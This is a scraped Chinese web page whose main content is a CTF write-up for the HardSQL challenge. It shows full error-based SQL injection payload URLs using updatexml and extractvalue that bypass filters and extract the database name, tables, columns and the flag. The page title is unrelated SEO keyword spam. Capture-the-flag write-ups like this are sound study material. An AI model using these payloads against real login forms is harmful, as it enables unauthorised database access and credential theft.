当前位置: 首页 > news >正文

网络公司做机场网站seo免费推广

网络公司做机场网站,seo免费推广,宣传片拍摄计划,烟台网站建设求职简历题目 打开页面显示为 查看源代码没有发现其他的提示信息#xff0c;随便尝试一下 错误 题目名为hardsql#xff0c;先来尝试有无sql注入存在 尝试输入单引号输入 显示页面存在注入 这里按照常规思路继续使用order by函数和union select函数进行查询#xff0c;但是页面没有…题目 打开页面显示为 查看源代码没有发现其他的提示信息随便尝试一下 错误 题目名为hardsql先来尝试有无sql注入存在 尝试输入单引号输入 显示页面存在注入 这里按照常规思路继续使用order by函数和union select函数进行查询但是页面没有任何显示 上述测试闭合时返回了错误信息用bp抓包看一下过滤的发现用于报错的注入函数没有被过滤 使用updatexml 通过查询可知updatexml在执行时第二个参数应该为合法的xpath路径否则会引发报错的同时将传入的参数进行输出 先查询数据库构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23password123 可得知数据库名为geek 查询表构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23password123 得到表 查字段构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23password123 可以得到字段名 然后查询想要的字段 构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23password123 发现flag显示不全函数显示有字符数限制 使用right可得到另一半 构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23password123 使用extractvalue 这里空格和没有使用()代替空格使用like代替 查数据库 构造payload /check.php?usernameadminpassword123^extractvalue(1,concat(0x7e,(select(database()))))%23查表 构造payload /check.php?usernameadminpassword123^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(geek)))))%23查字段 构造payload /check.php?usernameadminpassword123^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like(H4rDsq1)))))%23查数据 /check.php?usernameadminpassword123^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23这里也是显示不全按照上面的updatexml后的方法进行补全即可 参考文章链接 buuctf-[极客大挑战 2019]HardSQL(小宇特详解)_小宇特详解的博客-CSDN博客 https://www.cnblogs.com/GTL-JU/p/16042242.html https://www.cnblogs.com/upfine/p/16578800.html
http://www.hkea.cn/news/14446613/

相关文章:

  • 网站建设 千助简洁物流网站模板免费下载
  • 哪个网站有做烘焙蛋糕专业的配方做什么网站赚钱
  • 建设电影网站论文三亚政策最新消息
  • 中卫企业管理培训网站wordpress 自动升级
  • 长春建设网站公司设计网页代码源代码
  • 做公司网站要走哪些流程网站建设 目的
  • 城建设投资公司网站网站广告制作
  • 贵州省省建设厅网站中关村在线手机论坛
  • 杭州如何设计网站首页wordpress访问太慢
  • wordpress 仿站页面设置自定义wordpress
  • 网站开发业内人士网页版我的世界
  • 东莞网站公司哪家好网站如何快速推广
  • 武城做网站wordpress 后台 谷歌字体
  • 渭南市建网站企业网站优化找哪家
  • 主机做网站服务器怎么设置微信营销的优缺点
  • 石家庄网站定制制作phpstudy配置网站
  • 网站鼠标特效代码企业网站建设河北
  • 免费做网站网站有人哪些深圳搜索优化排名公司
  • 南宁网站设计公司排名淘宝网站的建设情况
  • 广州微信网站制作门源网站建设公司
  • 单位网站建设公司建设电子商务网站的启示
  • 临沂网站wordpress安装不了插件
  • 上海网站开发公司外包商务网站开发流程有哪三个阶段
  • 没电脑可以建网站吗建设部网站上标准合同
  • 跨境网站建站wordpress 插件页面
  • ui设计参考网站有哪些网址导航类网站如何做推广
  • 做gif表情包的网站请叫我鬼差大人王烨
  • 男科医院网站建设策略网站系统维护一个月正常吗
  • 网站定制开发什么意思东莞百度代做网站联系方式
  • 电商网站建设方案PPT收费网站设计